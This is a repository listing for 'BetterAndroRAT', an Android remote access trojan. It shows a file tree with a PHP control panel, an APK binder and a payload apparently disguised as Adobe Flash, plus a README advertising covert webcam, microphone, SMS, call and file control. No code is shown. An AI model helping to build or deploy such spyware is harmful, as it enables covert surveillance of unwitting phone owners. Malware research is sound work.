======================: FILES :======================
BetterAndroRAT
├── Binder
│   ├── APKBinder.sln
│   ├── APKBinder.vbproj
│   ├── app.config
│   ├── Form1.Designer.vb
│   ├── Form1.resx
│   ├── Form1.vb
│   ├── My Project
│   │   ├── Application.Designer.vb
│   │   ├── Application.myapp
│   │   ├── AssemblyInfo.vb
│   │   ├── Resources.Designer.vb
│   │   ├── Resources.resx
│   │   ├── Settings.Designer.vb
│   │   └── Settings.settings
│   └── Theme.vb
├── LICENSE
├── Panel
│   ├── Index
│   │   ├── addcommand.php
│   │   ├── applysettings.php
│   │   ├── assets
│   │   │   ├── css
│   │   │   │   ├── bootstrap.css
│   │   │   │   ├── bootstrap-glyphicons.css
│   │   │   │   ├── bootstrap.min.css
│   │   │   │   └── image-picker.css
│   │   │   ├── fonts
│   │   │   │   ├── glyphiconshalflings-regular.eot
│   │   │   │   ├── glyphiconshalflings-regular.otf
│   │   │   │   ├── glyphiconshalflings-regular.svg
│   │   │   │   ├── glyphiconshalflings-regular.ttf
│   │   │   │   └── glyphiconshalflings-regular.woff
│   │   │   ├── img
│   │   │   │   ├── banner.png
│   │   │   │   ├── bannerrot.png
│   │   │   │   ├── bg_off.jpg
│   │   │   │   ├── bg_on.jpg
│   │   │   │   ├── login_bg.png
│   │   │   │   └── logo.png
│   │   │   └── js
│   │   │       ├── bootstrap.js
│   │   │       ├── bootstrap.min.js
│   │   │       ├── date.js
│   │   │       ├── image-picker.min.js
│   │   │       ├── jquery.tablesorter.min.js
│   │   │       └── jquery.tablesorter.widgets.min.js
│   │   ├── blockbot.php
│   │   ├── clearawaiting.php
│   │   ├── clearmessages.php
│   │   ├── control.php
│   │   ├── deletebot.php
│   │   ├── deletefile.php
│   │   ├── deletepics.php
│   │   ├── filetable.php
│   │   ├── functions.php
│   │   ├── get-functions.php
│   │   ├── getimages.php
│   │   ├── getmessages.php
│   │   ├── get.php
│   │   ├── getwaitingcommands.php
│   │   ├── index.php
│   │   ├── login.php
│   │   ├── logout.php
│   │   ├── message.php
│   │   ├── new-upload.php
│   │   ├── reg.php
│   │   ├── settings.php
│   │   ├── setup
│   │   │   ├── createconfig.php
│   │   │   ├── index.php
│   │   │   ├── laststep.php
│   │   │   └── step1.php
│   │   ├── showpictures.php
│   │   ├── table.php
│   │   └── upload-pictures.php
│   └── Other Files
│       └── SQL.sql
├── Payload
│   ├── AndroidManifest.xml
│   ├── assets
│   │   └── android-support-v4.jar
│   ├── custom_rules.xml
│   ├── dexguard-project.txt
│   ├── gen
│   │   └── com
│   │       └── adobe
│   │           └── flash13
│   │               ├── BuildConfig.java
│   │               └── R.java
│   ├── ic_launcher-web.png
│   ├── libs
│   │   ├── android-support-v4.jar
│   │   └── httpmime-4.0.jar
│   ├── lint.xml
│   ├── proguard
│   │   ├── mapping.txt
│   │   ├── seeds.txt
│   │   └── usage.txt
│   ├── proguard-project.txt
│   ├── project.properties
│   ├── res
│   │   ├── drawable-hdpi
│   │   │   └── launcher.png
│   │   ├── drawable-ldpi
│   │   │   └── launcher.png
│   │   ├── drawable-mdpi
│   │   │   └── launcher.png
│   │   ├── drawable-xhdpi
│   │   │   └── launcher.png
│   │   ├── layout
│   │   │   ├── cameraview.xml
│   │   │   ├── main.xml
│   │   │   └── videoview.xml
│   │   ├── menu
│   │   │   └── connect_layout.xml
│   │   ├── values
│   │   │   ├── strings.xml
│   │   │   └── styles.xml
│   │   ├── values-v11
│   │   │   └── styles.xml
│   │   └── values-v14
│   │       └── styles.xml
│   └── src
│       └── com
│           ├── android
│           │   └── internal
│           │       └── telephony
│           │           └── ITelephony.java
│           └── connect
│               ├── CameraView.java
│               ├── Dendroid.java
│               ├── Dialog.java
│               ├── MyService.java
│               ├── PhoneListener.java
│               ├── RecordService.java
│               ├── ServiceReceiver.java
│               ├── UpdateApp.java
│               └── VideoView.java
└── README.md

35 directories, 105 files
======================: README CONTENT :======================
# Better Android RAT
Dendroid Based Android Remote Access Trojan
#### All responsibilities are at your own risk.
#### Please use it only for research purposes.
# Feature
* Remote Update & Install Application
* Remote WebCam
* Remote Microphone Record
* Remote File Management
* Remote Call & SMS
* Remote Device Controller


====================== GIT HISTORY: ======================
7569cab HEAD@{0}: clone: from https://github.com/mwsrc/BetterAndroRAT
commit 7569cab60ff6548997ac9233757e4fc52225a0ff
Author: Doge <lovely-doge@protonmail.com>
Date:   Sat Dec 24 16:51:32 2016 +0900

    README
